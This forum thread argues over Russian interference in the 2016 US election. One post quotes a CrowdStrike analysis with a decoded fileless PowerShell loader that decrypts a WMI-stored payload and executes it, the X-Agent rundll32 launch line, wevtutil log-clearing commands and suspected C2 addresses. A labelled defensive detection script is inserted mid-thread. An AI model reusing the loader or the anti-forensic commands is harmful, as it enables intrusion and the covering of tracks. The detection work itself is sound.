
Election Interference 2018 2020

  1. ptosis profile image77
    ptosisposted 5 days ago

    So why is it that although intel confirmed interference, politicos say that it did not change outcome? Then put a commission on voter fraud even though critics say the investigation is a Republican voter suppression panel?

    There is 1 person I believe, Snowden, who said "I think the NSA almost certainly saw who the intruders were. Why wouldn’t they? But I am also convinced that they saw a lot of other attackers on there, too,” Mr. Snowden added.

    As many as six or seven separate actors may have infiltrated the DNC, Mr. Snowden suggested, calling it a “big target” with apparently lax security."

    http://m.washingtontimes.com/news/2017/ … um=twitter


    What do you think? Intel should show evidence? And how come I hear zero info on upgrading and securing state level election machines with paper trails?

    Perhaps the national parties want to keep it rigged and 'Ol Bone Spurs was right all along?

    Hey, even a stopped clock is right twice a day.

    1. wilderness profile image95
      wildernessposted 5 days ago in reply to this

      What, specific, "interference" has been found?  And what, specifically, was the result of that interference?

      So far all I've heard is many, many claims of Russian interference, but not a single, proven specific act.  It's past any point of believability to keep seeing claims but never, ever, any evidence.  (Outside, of course, of DNC interference in its own primaries.)

  2. ptosis profile image77
    ptosisposted 5 days ago

    Exactly.  Almost 1 whole year since discovery.

    1. wilderness profile image95
      wildernessposted 5 days ago in reply to this

      Well, a year since claim, anyway.  No discovery to date.

      1. ptosis profile image77
        ptosisposted 5 days ago in reply to this

        That's just an opine trying to look like a fact.

        People reading this:
        Beware of bogus narratives and deliberate misinformation
        Since July 2016, the FBI has been investigating the Russian government’s attempt to influence the 2016 presidential election.

        "When it was discovered that the emails had been compromised, then-DNC Chairwoman Debbie Wasserman Schultz weirdly refused to allow forensic detectives from the FBI to examine the DNC server to probe the evidence of the theft. Why did the FBI accept that refusal?

        That strange behavior was not as bizarre as Wasserman Schultz's later frenzied efforts to protect her information technology specialist, Imran Awan, from Capitol Police and FBI investigations. Both agencies were hot on Awan's trail for allegedly unlawfully transferring secure data from government computers, and also for bank and federal procurement fraud." - http://www.chicagotribune.com/news/opin … story.html

        https://www.dni.gov/files/documents/ICA_2017_01.pdf

        "CrowdStrike Services Inc., our Incident Response group, was called by the Democratic National Committee (DNC), the formal governing body for the US Democratic Party, to respond to a suspected breach. We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network – COZY BEAR and FANCY BEAR. " https://www.crowdstrike.com/blog/bears- … committee/

        "Other companies independently discovered evidence that linked the attacks to the same culprit. SecureWorks found an improperly secured URL shortening account used by Fancy Bear while investigating other attacks by the group. That account contained evidence of nearly 4,000 phishing attacks Fancy Bear waged against Gmail addresses — the attack that ensnared Hillary Clinton campaign chairman John Podesta’s email account among them. " - http://thehill.com/policy/cybersecurity … ably-wrong

        1. wilderness profile image95
          wildernessposted 5 days ago in reply to this

          "Since July 2016, the FBI has been investigating the Russian government’s attempt to influence the 2016 presidential election."

          But the investigation hasn't found anything.  Which is what I said - no evidence to date.

          "Both agencies were hot on Awan's trail for allegedly unlawfully transferring secure data from government computers, and also for bank and federal procurement fraud."

          But no evidence of Russian involvement, or that the election was interfered with.  Which is what I said.

          "That account contained evidence of nearly 4,000 phishing attacks Fancy Bear waged against Gmail addresses — the attack that ensnared Hillary Clinton campaign chairman John Podesta’s email account among them."

          Again, no evidence of Russian involvement and no evidence the election was compromised.  Which is what I said.

          Bottom line: there is no evidence the Russians interfered with our election.  We assume they at least tried but can't even prove that.  So we keep making claims we can't support.

          1. ptosis profile image77
            ptosisposted 4 days ago in reply to this

            Nightmarish repetition there W. How do you KNOW there is no evidence to date? How do you KNOW that the evidence is not there? Are you part of the Deep State, and you're slumming it at HP?!?

            1. GA Anderson profile image84
              GA Andersonposted 4 days ago in reply to this

              Speaking of repetition ptosis, how do you know that the evidence is there?

              But, there may be a pending answer for all. The news is indicating that Mueller is near a break-through.
              .
              GA

              1. ptosis profile image77
                ptosisposted 3 days ago in reply to this

                GA

                What are you saying?

                https://www.washingtonpost.com/news/fac … f99980b493

                http://www.politifact.com/truth-o-meter … mail-leak/

                https://www.vox.com/policy-and-politics … ws-hannity

                https://www.nytimes.com/2016/12/13/us/p … ml?mcubz=0

                https://www.wired.com/2016/07/heres-kno … -dnc-hack/

                https://www.nytimes.com/2016/12/20/insi … ml?mcubz=0

                http://time.com/4600177/election-hack-r … ald-trump/

                I can give you 1K+ more urls.

                What are you saying when you ask me "How do I know"?

                The only person on this forum who denies that there is no evidence is the bot wilderness.  Are you saying you also believe there is 'no evidence' and only 'investigations'?


                Are you saying that there is NO Fancy Bear?!?!
                https://usercontent1.hubstatic.com/13703280.jpg

                1. wilderness profile image95
                  wildernessposted 3 days ago in reply to this

                  From your links:

                  "The U.S. government has not yet publicly named the culprit behind the DNC hack."
                  "Whether Russia hacked the DNC intending to affect the election remains unknown."
                  "DNC official allege that the Russian government is behind the breach."
                  "Julian Assange of Wikileaks gave a soft disavowal of claims that his whistleblowing organization is in cahoots with Russian intelligence, “Well, there is no proof of that whatsoever,” he said. “We have not disclosed our source, and of course, this is a diversion that's being pushed by the Hillary Clinton campaign.”
                  "If the allegations do prove correct, this is an unprecedented step for Russia. "
                  "If you’re unwilling to trust either camp <Russia hacked, Russia did not hack the DNC>, or if you want to find out if one side is acting in bad faith, you have little public information on which to form your own opinion."

                  If these are the types of things you're using to "prove" Russian interference in our election, you desperately need to go back to square one and start over. 

                  I have to say it's interesting (and comical) to see the claims, once more, change.  From Trump is tight with Putin, to Trump has connections in Russia, to someone in his party knows a Russian somewhere, to Russia fixed the election, to Russia hacked the DNC and told the true story of what was happening there.  A never ending witch hunt, with what is being hunted changing almost by the day when nothing can be found to prove the then-current allegations.  The desperation, and the denial that it's all a witch hunt, is almost as comical as the eternal insistence that there is something, somewhere and "we're gonna find it!".

                2. GA Anderson profile image84
                  GA Andersonposted 3 days ago in reply to this

                  ptosis, I didn't need to go through your links to find the facts, because I see that wilderness has done it for me. Which is not surprising - bots typically are very efficient.

                  Allegations and assumptions are not facts. Even if they do turn out to be true - until then they are still just allegations and assumptions.

                  GA

                  1. ptosis profile image77
                    ptosisposted 3 days ago in reply to this

                    Yeah, I knew the links are never clicked on.

                    But you insist on seeing the actual code, figuring you do not know how to program, I figured that would be a useless gesture also. Because I ALREADY DID THAT previously, and NOBODY commented on it. It was just like in the movie "IT", when people see something and then 'forget' it ever happened, and NEVER talk about it.

                    Wow, it's like a Cuban, mass brain aneurysm sonic disrupter coming straight outta of you all computers.

                    Repetition is HELL

                    https://www.dni.gov/files/documents/ICA_2017_01.pdf JAN 6 2017
                    You won't look at that - nope
                    https://www.crowdstrike.com/blog/bears- … committee/
                    you won't look at this neither! - Nope! nothing to see here - move along!


                    OK GA, W, since you are very good programmers and are experienced on computer forensics,  - I have NO IDEA, why you all wasting your talents here but here the stinking code.


                    powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand [Base64 payload not preserved in this copy]


                    This decodes to:

                    # Runs $data through the supplied crypto transform and returns the output bytes ($null on any error).
                    function perfCr($crTr, $data){
                        $ret = $null
                        try{
                            $ms = New-Object System.IO.MemoryStream
                            $cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)
                            $cs.Write($data, 0, $data.Length)
                            $cs.FlushFinalBlock()
                            $ret = $ms.ToArray()
                            $cs.Close()
                            $ms.Close()
                        }
                        catch{}
                        return $ret
                    }
                    # Decrypts $encData with Rijndael (AES) using the given key and IV.
                    function decrAes($encData, $key, $iv)
                    {
                        $ret = $null
                        try{
                            $prov = New-Object System.Security.Cryptography.RijndaelManaged
                            $prov.Key = $key
                            $prov.IV = $iv
                            $decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
                            $ret = perfCr $decr $encData
                        }
                        Catch{}
                        return $ret
                    }
                    # Reads property $pN of WMI class $cN, Base64-decodes and decrypts it, then executes the result.
                    function sWP($cN, $pN, $aK, $aI)
                    {
                        if($cN -eq $null -or $pN -eq $null){return $false}
                        try{
                            $wp = ([wmiclass]$cN).Properties[$pN].Value
                            $exEn = [Convert]::FromBase64String($wp)
                            $exDec = decrAes $exEn $aK $aI
                            $ex = [Text.Encoding]::UTF8.GetString($exDec)
                            if($ex -eq $null -or $ex -eq '')
                            {return}
                            # The decrypted text is run as PowerShell in memory.
                            Invoke-Expression $ex
                            return $true
                        }
                        catch{
                            return $false
                        }
                    }
                    $aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
                    $aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)
                    sWP 'Wmi' 'Wmi' $aeK $aeI | Out-Null

                    This one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads additional powershell modules from it, executing them in memory. In theory, the additional modules can do virtually anything on the victim system. The encryption keys in the script were different on every system. Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes.

                    FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as:

                    rundll32.exe "C:\Windows\twain_64.dll"

                    In addition, FANCY BEAR’s X-Tunnel network tunneling tool, which facilitates connections to NAT-ed environments, was used to also execute remote commands. Both tools were deployed via RemCOM, an open-source replacement for PsExec available from GitHub. They also engaged in a number of anti-forensic analysis measures, such as periodic event log clearing (via wevtutil cl System and wevtutil cl Security commands) and resetting timestamps of files.

                    .

                    Indicators of Compromise:





                    https://usercontent1.hubstatic.com/13703514.jpg



                    I betcha you all don't even know what trace route or  ARIN lookup is neither.  Here some more gamma rayz for your brain cells to explode on:

                    arin:185.86.148.227    arin
                    % This is the RIPE Database query service.
                    % The objects are in RPSL format.
                    %
                    % The RIPE Database is subject to Terms and Conditions.
                    % See http://www.ripe.net/db/support/db-terms-conditions.pdf

                    % Note: this output has been filtered.
                    %       To receive output for a database update, use the "-B" flag.

                    % Information related to '185.86.148.0 - 185.86.149.255'

                    % Abuse contact for '185.86.148.0 - 185.86.149.255' is 'abuse@yourserver.se'

                    inetnum:        185.86.148.0 - 185.86.149.255
                    netname:        YOURSERVER-SE
                    descr:          Virtual Server hosting
                    country:        SE
                    admin-c:        MB43991-RIPE
                    tech-c:         MB43991-RIPE
                    status:         ASSIGNED PA
                    mnt-by:         YOURSERVER
                    created:        2015-09-06T16:26:02Z
                    last-modified:  2017-05-27T05:38:49Z
                    source:         RIPE

                    person:         Michael Bentov
                    address:        Yourserver SIA
                    address:        Ulbrokas 23, Riga, LV-1021, Latvia
                    phone:          +371 60001383
                    nic-hdl:        MB43991-RIPE
                    mnt-by:         YOURSERVER
                    created:        2017-05-18T21:01:59Z
                    last-modified:  2017-05-18T21:06:24Z
                    source:         RIPE

                    % Information related to '185.86.148.0/24AS52173'

                    route:          185.86.148.0/24
                    descr:          YOURSERVER-SE
                    origin:         AS52173
                    mnt-by:         Makonix
                    created:        2015-09-30T21:22:59Z
                    last-modified:  2015-09-30T21:22:59Z
                    source:         RIPE

                    % This query was served by the RIPE Database Query Service version 1.89.2 (ANGUS)


                    IP : 95.215.45.5
                    SERVER : hosted-by.yourserver.se
                    COUNTRY : Latvia

                    https://usercontent1.hubstatic.com/13703514.jpg
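
The behaviours named in the post above (an encoded PowerShell launcher that executes a WMI class property, rundll32 started on a bare DLL path, and wevtutil clearing the System and Security logs) can be checked for in process-creation logs. The following is an added example, not part of the post or of the write-up it quotes; the sample command lines are constructed, and `ExampleClass` / `ExampleProp` and the finding labels are placeholders chosen here.

```python
import base64
import re

def enc_utf16(script):
    # PowerShell's -EncodedCommand value is Base64 over UTF-16LE text.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation command lines; class/property names are placeholders.
SAMPLE_EVENTS = [
    "powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand "
    + enc_utf16("Invoke-Expression ([wmiclass]'ExampleClass').Properties['ExampleProp'].Value"),
    'rundll32.exe "C:\\Windows\\twain_64.dll"',
    "wevtutil cl System",
    "wevtutil cl Security",
    "powershell.exe -File C:\\Scripts\\backup.ps1",
    "rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
    "wevtutil qe Security /c:5",
]

def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline uses -EncodedCommand or a prefix of it."""
    for m in re.finditer(r"(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", cmdline, re.I):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except ValueError:  # invalid Base64 or truncated UTF-16
                return None
    return None

def triage(cmdline):
    """Label one command line with the behaviours described in the post."""
    findings = []
    parts = cmdline.split(None, 1)
    image = parts[0].strip('"').lower() if parts else ""
    args = parts[1] if len(parts) > 1 else ""
    if image.endswith("powershell.exe"):
        script = decode_encoded_command(cmdline)
        if script is not None:
            findings.append("encoded-powershell")
            if "wmiclass" in script.lower() and re.search(r"invoke-expression|\biex\b", script, re.I):
                findings.append("wmi-property-executed")
    elif image.endswith("rundll32.exe"):
        # Heuristic: a bare DLL path with no ",ExportName" after it.
        if re.fullmatch(r'"?[^",]+\.dll"?\s*', args, re.I):
            findings.append("rundll32-no-export")
    elif image.endswith("wevtutil") or image.endswith("wevtutil.exe"):
        m = re.search(r"\b(?:cl|clear-log)\s+(system|security)\b", args, re.I)
        if m:
            findings.append("eventlog-cleared:" + m.group(1).lower())
    return findings

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage(event), event[:60])
```

The image name is taken as the first whitespace-separated token, so quoted paths containing spaces need a proper command-line parser before this is used on real telemetry.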

            2. wilderness profile image95
              wildernessposted 4 days ago in reply to this

              Wrong question.  You're the one claiming there IS interference...while producing nothing but investigations as proof the claim is true.  The right question is the one I've asked - where and what is the evidence supporting your claim.  Until it is shown the default is no known interference and thus no reason to make the claim.
